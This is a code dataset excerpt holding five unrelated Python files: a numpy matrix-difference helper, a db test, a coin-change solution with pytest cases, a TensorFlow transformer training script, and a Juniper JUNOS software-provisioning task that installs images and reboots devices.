index int64 0 1,000k | blob_id stringlengths 40 40 | code stringlengths 7 10.4M |
|---|---|---|
2,900 | 67a76f1f1dad4b7e73359f04ca8f599c8d32dc92 | #encoding:UTF-8
from numpy import *
#----------------------------------------------------------------------
def differences(a, b):
    """Report element-wise differences between two numpy matrices.

    Returns a matrix with one row per mismatching position, each row being
    (index, value-in-a, value-in-b). Assumes *a* and *b* are numpy matrix
    objects of the same shape (1-D ndarrays would make the final
    concatenate fail on dimension mismatch).
    """
    mismatch = a != b
    vals_a = a[mismatch]
    vals_b = b[mismatch]
    idx = nonzero(mismatch)[0]
    return concatenate((mat(idx), vals_a, vals_b)).T
2,901 | d5cb875dc31ca3dd7b165206415c346a076dd6e4 | import db
data = {'python book': ['10.09.2019', 200, 50, False]}
def test_insert_and_get_db(data):
    """Insert *data* into the db module's store and verify it round-trips.

    Returns True when the stored content equals what was inserted.
    """
    db.insert(data)
    stored = db.get_db()
    return stored == data
if __name__ == '__main__':
    # Smoke test: insert the sample record, read it back, then list books.
    print(f' Test insert dict in to db, and get dict from db is {test_insert_and_get_db(data)}')
    print(f'List books = {db.list_book()}')
|
2,902 | 332c530d221c9441d6ff3646f8e9226dc78067f9 |
#! /usr/bin/env python
# -*- coding: utf-8 -*-
# vim:fenc=utf-8
#
# Copyright © 2020 sungminoh <smoh2044@gmail.com>
#
# Distributed under terms of the MIT license.
"""
You are given coins of different denominations and a total amount of money. Write a function to compute the number of combinations that make up that amount. You may assume that you have infinite number of each kind of coin.
Example 1:
Input: amount = 5, coins = [1, 2, 5]
Output: 4
Explanation: there are four ways to make up the amount:
5=5
5=2+2+1
5=2+1+1+1
5=1+1+1+1+1
Example 2:
Input: amount = 3, coins = [2]
Output: 0
Explanation: the amount of 3 cannot be made up just with coins of 2.
Example 3:
Input: amount = 10, coins = [10]
Output: 1
Note:
You can assume that
1. 0 <= amount <= 5000
2. 1 <= coin <= 5000
3. the number of coins is less than 500
4. the answer is guaranteed to fit into signed 32-bit integer
"""
import sys
from functools import lru_cache
from typing import List
import pytest
class Solution:
    def change(self, amount: int, coins: List[int]) -> int:
        """Count combinations of coins (unlimited supply of each) summing to amount.

        Classic unbounded-knapsack DP: dp[a] holds the number of ways to form
        amount a using only the coins processed so far. Iterating coins in the
        outer loop counts combinations (order-insensitive), not permutations.

        Replaces the memoized recursion: O(len(coins) * amount) time and
        O(amount) space instead of O(len(coins) * amount^2), and no recursion
        depth limit for many coins.

        Args:
            amount: Target amount, 0 <= amount <= 5000.
            coins: Distinct coin denominations, each >= 1.

        Returns:
            Number of combinations making up `amount` (1 for amount == 0).
        """
        dp = [0] * (amount + 1)
        dp[0] = 1  # exactly one way to make 0: use no coins
        for coin in coins:
            for a in range(coin, amount + 1):
                dp[a] += dp[a - coin]
        return dp[amount]
# Pytest-parametrized check of the three examples from the problem statement.
@pytest.mark.parametrize('amount, coins, expected', [
    (5, [1,2,5], 4),
    (3, [2], 0),
    (10, [10], 1),
])
def test(amount, coins, expected):
    assert expected == Solution().change(amount, coins)
if __name__ == '__main__':
    # Run this file's own tests through pytest, forwarding CLI arguments.
    sys.exit(pytest.main(["-s", "-v"] + sys.argv))
|
2,903 | 7613dde4f49044fbca13acad2dd75587ef68f477 | import time
import argparse
import utils
from data_loader import DataLoader
from generate_model_predictions import sacrebleu_metric, compute_bleu
import tensorflow as tf
import os
import json
from transformer import create_masks
# Target sequences are padded, so the loss must be masked to ignore the
# pad positions when averaging.
def loss_function(real, pred, loss_object, pad_token_id):
    """Mean cross-entropy over non-pad target positions.

    Args:
        real: Ground-truth token ids, [batch_size, length_labels].
        pred: Model logits, [batch_size, length_logits, vocab_size].
        loss_object: Cross entropy loss configured with reduction='none'.
        pad_token_id: Pad token id to exclude from the loss.

    Returns:
        A scalar float tensor: summed masked loss / count of real tokens.
    """
    per_token_loss = loss_object(real, pred)
    not_pad = tf.math.logical_not(tf.math.equal(real, pad_token_id))
    weights = tf.cast(not_pad, dtype=per_token_loss.dtype)
    masked_loss = per_token_loss * weights
    return tf.reduce_sum(masked_loss) / tf.reduce_sum(weights)
def train_step(model, loss_object, optimizer, inp, tar,
               train_loss, train_accuracy, pad_token_id):
    """Run one optimizer step on a batch and update the running train metrics."""
    # Teacher forcing: decoder input is the target shifted right; the
    # expected output is the target shifted left.
    tar_inp = tar[:, :-1]
    tar_real = tar[:, 1:]
    enc_padding_mask, combined_mask, dec_padding_mask = create_masks(inp, tar_inp)
    with tf.GradientTape() as tape:
        # training=True is only needed if there are layers with different
        # behavior during training versus inference (e.g. Dropout).
        predictions, _ = model(inp, tar_inp,
                               True,
                               enc_padding_mask,
                               combined_mask,
                               dec_padding_mask)
        loss = loss_function(tar_real, predictions, loss_object, pad_token_id)
    gradients = tape.gradient(loss, model.trainable_variables)
    optimizer.apply_gradients(zip(gradients, model.trainable_variables))
    train_loss(loss)
    train_accuracy(tar_real, predictions)
def val_step(model, loss_object, inp, tar,
             val_loss, val_accuracy, pad_token_id):
    """Run one gradient-free forward pass and update the running val metrics."""
    decoder_input = tar[:, :-1]
    expected_output = tar[:, 1:]
    enc_mask, look_ahead_mask, dec_mask = create_masks(inp, decoder_input)
    # training=False: inference behavior (e.g. dropout disabled).
    predictions, _ = model(inp, decoder_input,
                           False,
                           enc_mask,
                           look_ahead_mask,
                           dec_mask)
    batch_loss = loss_function(expected_output, predictions, loss_object, pad_token_id)
    val_loss(batch_loss)
    val_accuracy(expected_output, predictions)
def compute_bleu_score(transformer_model, dataset, user_config, tokenizer_tar, epoch):
    """Translate *dataset*, score with sacreBLEU, and save predictions under ../log/.

    Args:
        transformer_model: Trained transformer used for generation.
        dataset: Dataset to translate.
        user_config: Dict of user settings (languages, checkpoint path, ...).
        tokenizer_tar: Target-language tokenizer (provides MAX_LENGTH).
        epoch: Epoch tag embedded in the prediction file name.
    """
    inp_language = user_config["inp_language"]
    target_language = user_config["target_language"]
    checkpoint_path = user_config["transformer_checkpoint_path"]
    val_aligned_path_tar = user_config["val_data_path_{}".format(target_language)]
    pred_file_path = "../log/log_{}_{}/".format(inp_language, target_language) + checkpoint_path.split('/')[
        -1] + "_epoch-" + str(epoch) + "_prediction_{}.txt".format(target_language)
    sacrebleu_metric(transformer_model, pred_file_path, None,
                     tokenizer_tar, dataset,
                     tokenizer_tar.MAX_LENGTH)
    print("-----------------------------")
    compute_bleu(pred_file_path, val_aligned_path_tar, print_all_scores=False)
    print("-----------------------------")
    # append checkpoint and score to file name for easy reference
    # NOTE(review): new_path is assembled from the same components as
    # pred_file_path, so this rename is currently a no-op; the "append
    # score" part appears unimplemented — confirm intended behavior.
    new_path = "../log/log_{}_{}/".format(inp_language, target_language) + checkpoint_path.split('/')[
        -1] + "_epoch-" + str(epoch) + "_prediction_{}".format(target_language) + ".txt"
    # append score and checkpoint name to file_name
    os.rename(pred_file_path, new_path)
    print("Saved translated prediction at {}".format(new_path))
def do_training(user_config):
    """Full training loop: load tokenizers, data and model, then train for the
    configured number of epochs with periodic validation, checkpointing and
    optional BLEU scoring.

    Args:
        user_config: Dict of user settings (languages, data paths, batch
            size, epoch count, checkpoint path, compute_bleu flag, ...).
    """
    inp_language = user_config["inp_language"]
    target_language = user_config["target_language"]
    print("\n****Training model from {} to {}****\n".format(inp_language, target_language))
    print("****Loading tokenizers****")
    # load pre-trained tokenizer
    tokenizer_inp, tokenizer_tar = utils.load_tokenizers(inp_language, target_language, user_config)
    print("****Loading train dataset****")
    # train data loader
    train_aligned_path_inp = user_config["train_data_path_{}".format(inp_language)]
    train_aligned_path_tar = user_config["train_data_path_{}".format(target_language)]
    train_dataloader = DataLoader(user_config["transformer_batch_size"],
                                  train_aligned_path_inp,
                                  train_aligned_path_tar,
                                  tokenizer_inp,
                                  tokenizer_tar,
                                  inp_language,
                                  target_language,
                                  True)
    train_dataset = train_dataloader.get_data_loader()
    print("****Loading val dataset****")
    # val data loader
    val_aligned_path_inp = user_config["val_data_path_{}".format(inp_language)]
    val_aligned_path_tar = user_config["val_data_path_{}".format(target_language)]
    val_dataloader = DataLoader(user_config["transformer_batch_size"] * 2,  # for fast validation increase batch size
                                val_aligned_path_inp,
                                val_aligned_path_tar,
                                tokenizer_inp,
                                tokenizer_tar,
                                inp_language,
                                target_language,
                                False)
    val_dataset = val_dataloader.get_data_loader()
    # define loss and accuracy metrics
    loss_object = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True, reduction='none')
    train_loss = tf.keras.metrics.Mean(name='train_loss')
    train_accuracy = tf.keras.metrics.SparseCategoricalAccuracy(name='train_accuracy')
    val_loss = tf.keras.metrics.Mean(name='val_loss')
    val_accuracy = tf.keras.metrics.SparseCategoricalAccuracy(name='val_accuracy')
    print("****Loading transformer model****")
    # load model and optimizer
    transformer_model, optimizer, ckpt_manager = \
        utils.load_transformer_model(user_config, tokenizer_inp, tokenizer_tar)
    epochs = user_config["transformer_epochs"]
    print("\nTraining model now...")
    for epoch in range(epochs):
        print()
        start = time.time()
        # Reset running metrics at the start of every epoch.
        train_loss.reset_states()
        train_accuracy.reset_states()
        val_loss.reset_states()
        val_accuracy.reset_states()
        # inp -> english, tar -> french
        for (batch, (inp, tar, _)) in enumerate(train_dataset):
            train_step(transformer_model, loss_object, optimizer, inp, tar,
                       train_loss, train_accuracy, pad_token_id=tokenizer_tar.pad_token_id)
            if batch % 50 == 0:
                print('Train: Epoch {} Batch {} Loss {:.4f} Accuracy {:.4f}'.format(
                    epoch + 1, batch, train_loss.result(), train_accuracy.result()))
            # Periodic mid-epoch validation every 2200 batches.
            if (batch + 1) % 2200 == 0:
                # inp -> english, tar -> french
                for (_, (inp, tar, _)) in enumerate(val_dataset):
                    val_step(transformer_model, loss_object, inp, tar,
                             val_loss, val_accuracy, pad_token_id=tokenizer_tar.pad_token_id)
                print('Batch {}: Val Loss: {:.4f}, Val Accuracy: {:.4f}\n'.format(batch, val_loss.result(),
                                                                                  val_accuracy.result()))
                if user_config["compute_bleu"]:
                    print("\nComputing BLEU at batch {}: ".format(batch))
                    # NOTE(review): epoch is 0-based, so batch * epoch + 1 is
                    # always 1 throughout the first epoch — confirm the
                    # intended file tag.
                    compute_bleu_score(transformer_model, val_dataset, user_config, tokenizer_tar, batch * epoch + 1)
        print("After {} epochs".format(epoch + 1))
        print('Train Loss: {:.4f}, Train Accuracy: {:.4f}'.format(train_loss.result(), train_accuracy.result()))
        # inp -> english, tar -> french
        for (batch, (inp, tar, _)) in enumerate(val_dataset):
            val_step(transformer_model, loss_object, inp, tar,
                     val_loss, val_accuracy, pad_token_id=tokenizer_tar.pad_token_id)
        print('Val Loss: {:.4f}, Val Accuracy: {:.4f}'.format(val_loss.result(), val_accuracy.result()))
        print('Time taken for training epoch {}: {} secs'.format(epoch + 1, time.time() - start))
        # evaluate and save model every x-epochs
        ckpt_save_path = ckpt_manager.save()
        print('Saving checkpoint after epoch {} at {}'.format(epoch + 1, ckpt_save_path))
        if user_config["compute_bleu"]:
            print("\nComputing BLEU at epoch {}: ".format(epoch + 1))
            compute_bleu_score(transformer_model, val_dataset, user_config, tokenizer_tar, epoch + 1)
def main():
    """Entry point: parse CLI args, load and print config, seed RNGs, train."""
    arg_parser = argparse.ArgumentParser()
    arg_parser.add_argument("--config", help="Configuration file containing training parameters", type=str)
    cli_args = arg_parser.parse_args()
    user_config = utils.load_file(cli_args.config)
    utils.set_seed(user_config["random_seed"])
    print(json.dumps(user_config, indent=2))
    do_training(user_config)
if __name__ == "__main__":
    main()
|
2,904 | 45cdf33f509e7913f31d2c1d6bfada3a84478736 | # DO NOT ALTER OR REMOVE COPYRIGHT NOTICES OR THIS FILE HEADER
# Copyright (c) 2018 Juniper Networks, Inc.
# All rights reserved.
# Use is subject to license terms.
#
# Author: cklewar
import os
import threading
import time
from jnpr.junos import Device
from jnpr.junos import exception
from jnpr.junos.utils.config import Config
from jnpr.junos.utils.sw import SW
from paramiko import BadHostKeyException, AuthenticationException
from scp import SCPClient
import lib.constants as c
from lib.logmsg import LogCommon
from lib.logmsg import LogSoftwareTask as logmsg
from lib.tasks.task import Task
from lib.tasks.tasktools import Software
from lib.tools import Tools
class SoftwareTask(Task):
    """Provisioning task that installs a target JUNOS image on a device."""
    # Task-framework metadata.
    CHECK_SCHEMA = True
    TASK_TYPE = c.TASK_TYPE_PROVISION
    TASK_VERSION = 1.0
    # Devices currently being provisioned, keyed by serial number. Shared
    # across threads; writes are guarded by sample_devices_lock in the
    # static progress callbacks and in post_run_task.
    sample_devices = dict()
    sample_devices_lock = threading.Lock()

    def __init__(self, sample_device=None, shared=None):
        """Initialize the task for *sample_device* and log subclass info."""
        super(SoftwareTask, self).__init__(sample_device=sample_device, shared=shared)
        self.logger.debug(Tools.create_log_msg(self.task_name, self.sample_device.deviceSerial,
                                               LogCommon.IS_SUBCLASS.format(self.task_name,
                                                                            issubclass(SoftwareTask, Task))))
    def pre_run_task(self):
        # No preparation needed before run_task for software provisioning.
        pass
    def run_task(self):
        """
        Provision device images.

        Compares the device's installed software version against the
        configured target version for its model and, when required,
        triggers the image installation via install_device_software().
        :return: None (task state is reported via update_task_state)
        """
        # Target JUNOS version configured for this device model; None when
        # the model has no entry in the group config.
        target_version = getattr(self.grp_cfg.TASKS.Provision.Software.TargetVersion, self.sample_device.deviceModel,
                                 None)
        if self.sample_device.deviceStatus == c.DEVICE_STATUS_REBOOTED:
            # Device has been rebooted do not update again
            Tools.emit_log(task_name=self.task_name, sample_device=self.sample_device,
                           message=logmsg.SW_INSTALLED_VERS.format(self.sample_device.softwareVersion))
            Tools.emit_log(task_name=self.task_name, sample_device=self.sample_device,
                           message=logmsg.SW_TARGET_VERS.format(target_version))
            Tools.emit_log(task_name=self.task_name, sample_device=self.sample_device,
                           message=logmsg.SW_NO_UPDATE_NEEDED_SAME)
            self.sample_device.deviceIsRebooted = False
            self.update_task_state(new_task_state=c.TASK_STATE_DONE, task_state_message=c.TASK_STATE_MSG_DONE)
        else:
            Tools.emit_log(task_name=self.task_name, sample_device=self.sample_device,
                           message=logmsg.SW_START_UPDATE.format(self.sample_device.deviceSerial))
            # Register the device so the static progress callbacks can
            # publish state for it by serial number.
            SoftwareTask.sample_devices[self.sample_device.deviceSerial] = self.sample_device
            if target_version is not None:
                # feedback: 0 = same version, 1 = device newer, otherwise
                # an update is needed.
                feedback = Software.compare_device_vers_with_target_vers(self.sample_device.softwareVersion,
                                                                         target_version)
                if feedback == 0:
                    self.update_task_state(new_task_state=c.TASK_STATE_DONE,
                                           task_state_message=logmsg.SW_DONE_SAME_VERS)
                    Tools.emit_log(task_name=self.task_name, sample_device=self.sample_device,
                                   message=logmsg.SW_INSTALLED_VERS.format(
                                       self.sample_device.softwareVersion))
                    Tools.emit_log(task_name=self.task_name, sample_device=self.sample_device,
                                   message=logmsg.SW_TARGET_VERS.format(target_version))
                    Tools.emit_log(task_name=self.task_name,
                                   task_state={'taskState': self.task_state, 'taskStateMsg': logmsg.SW_DONE_SAME_VERS},
                                   sample_device=self.sample_device, grp_cfg=self.grp_cfg, shared=self.shared,
                                   scope=c.LOGGER_SCOPE_ALL, level=c.LOGGER_LEVEL_INFO,
                                   message=logmsg.SW_NO_UPDATE_NEEDED_SAME)
                elif feedback == 1:
                    # Device already runs a newer version than the target.
                    self.update_task_state(new_task_state=c.TASK_STATE_DONE,
                                           task_state_message=logmsg.SW_DONE_DEV_NEWER_VERS)
                    Tools.emit_log(task_name=self.task_name, sample_device=self.sample_device,
                                   message=logmsg.SW_INSTALLED_VERS.format(
                                       self.sample_device.softwareVersion))
                    Tools.emit_log(task_name=self.task_name, sample_device=self.sample_device,
                                   message=logmsg.SW_TARGET_VERS.format(target_version))
                    Tools.emit_log(task_name=self.task_name,
                                   task_state={'taskState': self.task_state,
                                               'taskStateMsg': logmsg.SW_DONE_DEV_NEWER_VERS},
                                   sample_device=self.sample_device, grp_cfg=self.grp_cfg, shared=self.shared,
                                   scope=c.LOGGER_SCOPE_ALL, level=c.LOGGER_LEVEL_INFO,
                                   message=logmsg.SW_NO_UPDATE_NEEDED_NEWER)
                else:
                    # Update needed: locate the image and install it.
                    Tools.emit_log(task_name=self.task_name, sample_device=self.sample_device,
                                   message=logmsg.SW_INSTALLED_VERS.format(
                                       self.sample_device.softwareVersion))
                    Tools.emit_log(task_name=self.task_name, sample_device=self.sample_device,
                                   message=logmsg.SW_TARGET_VERS.format(target_version))
                    Tools.emit_log(task_name=self.task_name, sample_device=self.sample_device,
                                   message=logmsg.SW_UPDATE_NEEDED.format(
                                       self.sample_device.softwareVersion, target_version))
                    filename = Software.get_software_image_name(self.sample_device, target_version,
                                                                grp_cfg=self.grp_cfg)
                    if filename:
                        full_path = self.grp_cfg.TASKS.Provision.Software.ImageDir + filename
                        if self.sample_device.deviceConnection.connected:
                            self.sample_device = self.install_device_software(full_path, filename, target_version)
                            if self.sample_device is not None:
                                if self.task_state != c.TASK_STATE_FAILED and self.task_state != c.TASK_STATE_REBOOTING:
                                    if self.sample_device.deviceConnection is not None:
                                        # Re-read version facts after install.
                                        self.sample_device.deviceConnection.facts_refresh(keys='version')
                                        self.sample_device.softwareVersion = self.sample_device.deviceConnection.facts[
                                            "version"]
                                        self.update_task_state(new_task_state=c.TASK_STATE_DONE,
                                                               task_state_message=c.TASK_STATE_MSG_DONE)
                                        Tools.emit_log(task_name=self.task_name,
                                                       task_state={'taskState': self.task_state,
                                                                   'taskStateMsg': c.TASK_STATE_MSG_DONE},
                                                       sample_device=self.sample_device, grp_cfg=self.grp_cfg,
                                                       shared=self.shared,
                                                       scope=c.LOGGER_SCOPE_ALL, level=c.LOGGER_LEVEL_INFO,
                                                       message=logmsg.SW_NO_UPDATE_NEEDED_SAME)
                                    else:
                                        Tools.emit_log(task_name=self.task_name, sample_device=self.sample_device,
                                                       message=logmsg.SW_CONN_NOK.format(self.sample_device.deviceIP))
                                        self.update_task_state(new_task_state=c.TASK_STATE_FAILED,
                                                               task_state_message=c.TASK_STATE_MSG_FAILED)
                                        return
                                else:
                                    return
                            else:
                                # NOTE(review): install_device_software() can
                                # fall through and return None; this branch
                                # then dereferences self.sample_device —
                                # confirm this path cannot be reached.
                                Tools.emit_log(task_name=self.task_name, sample_device=self.sample_device,
                                               message=logmsg.SW_CONN_NOK.format(self.sample_device.deviceIP))
                                self.update_task_state(new_task_state=c.TASK_STATE_FAILED,
                                                       task_state_message=logmsg.SW_CONN_NOK.format(
                                                           self.sample_device.deviceIP))
                        else:
                            Tools.emit_log(task_name=self.task_name, sample_device=self.sample_device,
                                           message=logmsg.SW_CONN_NOK.format(self.sample_device.deviceIP))
                            self.update_task_state(new_task_state=c.TASK_STATE_FAILED,
                                                   task_state_message=logmsg.SW_CONN_NOK.format(
                                                       self.sample_device.deviceIP))
                    else:
                        self.update_task_state(new_task_state=c.TASK_STATE_FAILED,
                                               task_state_message=logmsg.SW_IMG_NOK.format(target_version))
            else:
                self.logger.info(Tools.create_log_msg(self.task_name, self.sample_device.deviceSerial,
                                                      logmsg.SW_NO_TARGET_VERS_FOUND.format(
                                                          self.sample_device.deviceModel)))
                self.update_task_state(new_task_state=c.TASK_STATE_FAILED,
                                       task_state_message=logmsg.SW_IMG_VALUE_NOK.format(
                                           self.sample_device.deviceGroup))
    def install_device_software(self, path, image, target_version):
        """
        Call PyEz to install new JUNOS image to device.

        :param path: local path of the software image
        :param image: image file name
        :param target_version: JUNOS version being installed
        :return: the (possibly updated) sample device; may fall through and
            implicitly return None on the probe-failure paths
        """
        package = os.path.join(os.getcwd(), path)
        if c.SERVICEPLUGIN_OSSH in self.sample_device.deviceServicePlugin:
            # Outbound-SSH devices: copy the image via SCP over the existing
            # session transport, install with pkgadd, then reboot.
            try:
                Tools.emit_log(task_name=self.task_name, sample_device=self.sample_device,
                               message=logmsg.SW_CLEANUP_STORAGE)
                self.update_task_state(new_task_state=c.TASK_STATE_PROGRESS,
                                       task_state_message=logmsg.SW_CLEANUP_STORAGE)
                self.sample_device.deviceConnection.rpc.request_system_storage_cleanup()
                Tools.emit_log(task_name=self.task_name, sample_device=self.sample_device,
                               message=logmsg.SW_COPY_IMG.format(image))
                self.update_task_state(new_task_state=c.TASK_STATE_PROGRESS,
                                       task_state_message=logmsg.SW_COPY_IMG.format(image))
                # progress = SoftwareTask.copy_progress
                with SCPClient(transport=self.sample_device.deviceConnection._conn._session.transport) as scp:
                    scp.put(package, remote_path=self.grp_cfg.TASKS.Provision.Software.RemoteDir)
            except (BadHostKeyException, AuthenticationException) as e:
                Tools.emit_log(task_name=self.task_name, sample_device=self.sample_device,
                               message=logmsg.SW_COPY_IMG_NOK.format(e.message))
                self.update_task_state(new_task_state=c.TASK_STATE_FAILED,
                                       task_state_message=logmsg.SW_COPY_IMG_NOK.format(e.message))
                return self.sample_device
            try:
                Tools.emit_log(task_name=self.task_name, sample_device=self.sample_device,
                               message=logmsg.SW_INSTALL_VERS.format(target_version))
                self.update_task_state(new_task_state=c.TASK_STATE_PROGRESS,
                                       task_state_message=logmsg.SW_INSTALL_VERS.format(target_version))
                result = self.sample_device.deviceConnection.sw.pkgadd(
                    self.grp_cfg.TASKS.Provision.Software.RemoteDir + image,
                    dev_timeout=self.grp_cfg.TASKS.Provision.Software.PkgAddDevTimeout)
            except Exception as err:
                Tools.emit_log(task_name=self.task_name, sample_device=self.sample_device,
                               message=logmsg.SW_INSTALL_NOK.format(str(err)))
                self.update_task_state(new_task_state=c.TASK_STATE_FAILED,
                                       task_state_message=logmsg.SW_INSTALL_NOK.format(str(err)))
                return self.sample_device
            if result is True:
                Tools.emit_log(task_name=self.task_name, sample_device=self.sample_device,
                               message=logmsg.SW_INSTALL_OK.format(self.sample_device.deviceIP))
                self.update_task_state(new_task_state=c.TASK_STATE_PROGRESS,
                                       task_state_message=logmsg.SW_INSTALL_OK.format(self.sample_device.deviceIP))
            else:
                Tools.emit_log(task_name=self.task_name, sample_device=self.sample_device,
                               message=logmsg.SW_INSTALL_NOK.format(str(result)))
                self.update_task_state(new_task_state=c.TASK_STATE_FAILED,
                                       task_state_message=logmsg.SW_INSTALL_NOK.format(str(result)))
                time.sleep(3)
                return self.sample_device
            Tools.emit_log(task_name=self.task_name, sample_device=self.sample_device,
                           message=logmsg.SW_REBOOT.format(self.sample_device.deviceIP))
            self.update_task_state(new_task_state=c.TASK_STATE_PROGRESS,
                                   task_state_message=logmsg.SW_REBOOT.format(self.sample_device.deviceIP))
            try:
                rsp = self.sample_device.deviceConnection.sw.reboot()
                Tools.emit_log(task_name=self.task_name, sample_device=self.sample_device,
                               message=logmsg.SW_REBOOT_DEV_RESP.format(rsp.replace('\n', " ")))
                self.sample_device.deviceConnection.close()
                self.sample_device.deviceIsRebooted = True
                self.update_task_state(new_task_state=c.TASK_STATE_REBOOTING,
                                       task_state_message='Rebooting...')
                # Forget the device so the outbound-ssh service treats the
                # post-reboot connection as a fresh one.
                c.oss_seen_devices_lck.acquire()
                try:
                    if self.sample_device.deviceIP in c.oss_seen_devices:
                        c.oss_seen_devices.pop(self.sample_device.deviceIP, None)
                finally:
                    c.oss_seen_devices_lck.release()
                return self.sample_device
            except exception.ConnectClosedError:
                # The connection dropping here just means the reboot started.
                Tools.emit_log(task_name=self.task_name, sample_device=self.sample_device,
                               message=logmsg.SW_CONN_LOOSE_REBOOT)
                self.update_task_state(new_task_state=c.TASK_STATE_REBOOTING,
                                       task_state_message=logmsg.SW_CONN_LOOSE_REBOOT)
                return self.sample_device
        else:
            # Directly-reachable devices: PyEZ copies and installs in one
            # call, then we reboot and wait for the device to cycle.
            try:
                result = self.sample_device.deviceConnection.sw.install(package=package,
                                                                       remote_path=self.grp_cfg.TASKS.Provision.Software.RemoteDir,
                                                                       cleanfs=True, no_copy=False,
                                                                       progress=SoftwareTask.install_progress)
            except Exception as err:
                Tools.emit_log(task_name=self.task_name, sample_device=self.sample_device,
                               message=logmsg.SW_INSTALL_NOK.format(str(err)))
                self.update_task_state(new_task_state=c.TASK_STATE_FAILED, task_state_message=str(err))
                return self.sample_device
            if result is True:
                Tools.emit_log(task_name=self.task_name, sample_device=self.sample_device,
                               message=logmsg.SW_INSTALL_OK.format(self.sample_device.deviceIP))
                self.update_task_state(new_task_state=c.TASK_STATE_PROGRESS,
                                       task_state_message=logmsg.SW_INSTALL_OK.format(self.sample_device.deviceIP))
            else:
                Tools.emit_log(task_name=self.task_name, sample_device=self.sample_device,
                               message=logmsg.SW_INSTALL_NOK.format(str(result)))
                self.update_task_state(new_task_state=c.TASK_STATE_FAILED,
                                       task_state_message=logmsg.SW_INSTALL_NOK.format(str(result)))
                time.sleep(3)
                return self.sample_device
            Tools.emit_log(task_name=self.task_name, sample_device=self.sample_device,
                           message=logmsg.SW_REBOOT.format(self.sample_device.deviceIP))
            self.update_task_state(new_task_state=c.TASK_STATE_PROGRESS,
                                   task_state_message=logmsg.SW_REBOOT.format(self.sample_device.deviceIP))
            try:
                rsp = self.sample_device.deviceConnection.sw.reboot()
                Tools.emit_log(task_name=self.task_name, sample_device=self.sample_device,
                               message=logmsg.SW_REBOOT_DEV_RESP.format(rsp.replace('\n', " ")))
                # self.sample_device.deviceConnection.close()
            except exception.ConnectClosedError:
                Tools.emit_log(task_name=self.task_name, sample_device=self.sample_device,
                               message=logmsg.SW_CONN_LOOSE_REBOOT)
                self.update_task_state(new_task_state=c.TASK_STATE_REBOOTING,
                                       task_state_message=logmsg.SW_CONN_LOOSE_REBOOT)
            finally:
                # NOTE(review): returns inside this finally will swallow any
                # in-flight exception from the try above — confirm intended.
                # First wait for the device to actually go down...
                alive = self.probe_device_not_alive(self.sample_device,
                                                    self.grp_cfg.TASKS.Provision.Software.RetryProbeCounter)
                if not alive:
                    self.sample_device.deviceIsRebooted = True
                    Tools.emit_log(task_name=self.task_name, sample_device=self.sample_device,
                                   message=logmsg.SW_PROBE_WAKEUP.format(self.sample_device.deviceIP))
                    status, self.sample_device = Tools.create_dev_conn(self.sample_device, connect=False)
                    if status:
                        # ...then wait for it to come back up.
                        alive = self.probe_device_alive(self.sample_device,
                                                        self.grp_cfg.TASKS.Provision.Software.RebootProbeTimeout)
                        if alive:
                            Tools.emit_log(task_name=self.task_name, sample_device=self.sample_device,
                                           message=logmsg.SW_PROBE_WAKUP_OK.format(self.sample_device.deviceIP))
                            self.sample_device.deviceIsRebooted = False
                            self.update_task_state(new_task_state=c.TASK_STATE_PROGRESS,
                                                   task_state_message=logmsg.SW_PROBE_WAKUP_OK.format(
                                                       self.sample_device.deviceIP))
                            status, self.sample_device = Tools.create_dev_conn(self.sample_device)
                            if status:
                                self.sample_device.deviceConnection.bind(cu=Config, sw=SW)
                                # Tools.emit_log(task_name=self.task_name, sample_device=self.sample_device,
                                #                message=logmsg.SW_CONN_OK.format(self.sample_device.deviceIP))
                                self.update_task_state(new_task_state=c.TASK_STATE_PROGRESS,
                                                       task_state_message=logmsg.SW_CONN_OK.format(
                                                           self.sample_device.deviceIP))
                                return self.sample_device
                            else:
                                return self.sample_device
                    else:
                        self.update_task_state(new_task_state=c.TASK_STATE_FAILED,
                                               task_state_message=c.TASK_STATE_MSG_FAILED)
                        self.sample_device.deviceConnection = None
                        return self.sample_device
                else:
                    # Device never went down within the allotted probes.
                    Tools.emit_log(task_name=self.task_name, sample_device=self.sample_device,
                                   message=logmsg.SW_PROBE_DEV_NOK.format(self.sample_device.deviceIP,
                                                                          self.grp_cfg.TASKS.Provision.Software.RebootProbeCounter))
                    self.update_task_state(new_task_state=c.TASK_STATE_FAILED,
                                           task_state_message=logmsg.SW_PROBE_DEV_NOK.format(
                                               self.sample_device.deviceIP,
                                               self.grp_cfg.TASKS.Provision.Software.RebootProbeCounter))
def probe_device_alive(self, device, timeout):
"""
:param device:
:param timeout:
:return:
"""
alive = device.deviceConnection.probe(timeout=5)
probe_attemps = self.grp_cfg.TASKS.Provision.Software.RebootProbeCounter
probe_cntr = 0
while not alive:
if probe_cntr <= probe_attemps:
alive = device.deviceConnection.probe(timeout)
probe_cntr += 1
Tools.emit_log(task_name=self.task_name, sample_device=device,
message=logmsg.SW_PROBE_DEV.format(timeout))
self.update_task_state(new_task_state=c.TASK_STATE_REBOOTING,
task_state_message=logmsg.SW_PROBE_WAIT_REBOOT.format(str(probe_cntr)))
else:
self.update_task_state(new_task_state=c.TASK_STATE_FAILED, task_state_message=c.TASK_STATE_FAILED)
break
return alive
def probe_device_not_alive(self, device, timeout):
"""
:param device:
:param timeout:
:return:
"""
alive = device.deviceConnection.probe(timeout=5)
probe_attemps = self.grp_cfg.TASKS.Provision.Software.RebootProbeCounter
probe_cntr = 0
while alive:
if probe_cntr <= probe_attemps:
alive = device.deviceConnection.probe(1)
probe_cntr += 1
Tools.emit_log(task_name=self.task_name, sample_device=device,
message=logmsg.SW_PROBE_DEV.format(timeout))
self.update_task_state(new_task_state=c.TASK_STATE_REBOOTING,
task_state_message=logmsg.SW_PROBE_WAIT_REBOOT.format(str(probe_cntr)))
time.sleep(timeout)
else:
self.update_task_state(new_task_state=c.TASK_STATE_FAILED, task_state_message=c.TASK_STATE_MSG_FAILED)
break
return alive
    @staticmethod
    def install_progress(dev, report):
        """PyEZ sw.install progress callback: log *report* and publish it as
        the device's current 'Software' task state (lock-guarded)."""
        c.logger.info(
            '[{0:{1}}][{2:{3}}][{4}]'.format('SOFTWARE', c.FIRST_PAD, dev.facts["serialnumber"], c.SECOND_PAD, report))
        with SoftwareTask.sample_devices_lock:
            SoftwareTask.sample_devices[dev.facts['serialnumber']].deviceTasks.taskState['Software'] = {
                'taskState': c.TASK_STATE_PROGRESS, 'taskStateMsg': report}
    @staticmethod
    def copy_progress(filename, size, sent):
        """SCP progress callback: log the copy percentage for *filename*."""
        # print filename + " " + str(int(size)) + " " + str(int(sent))
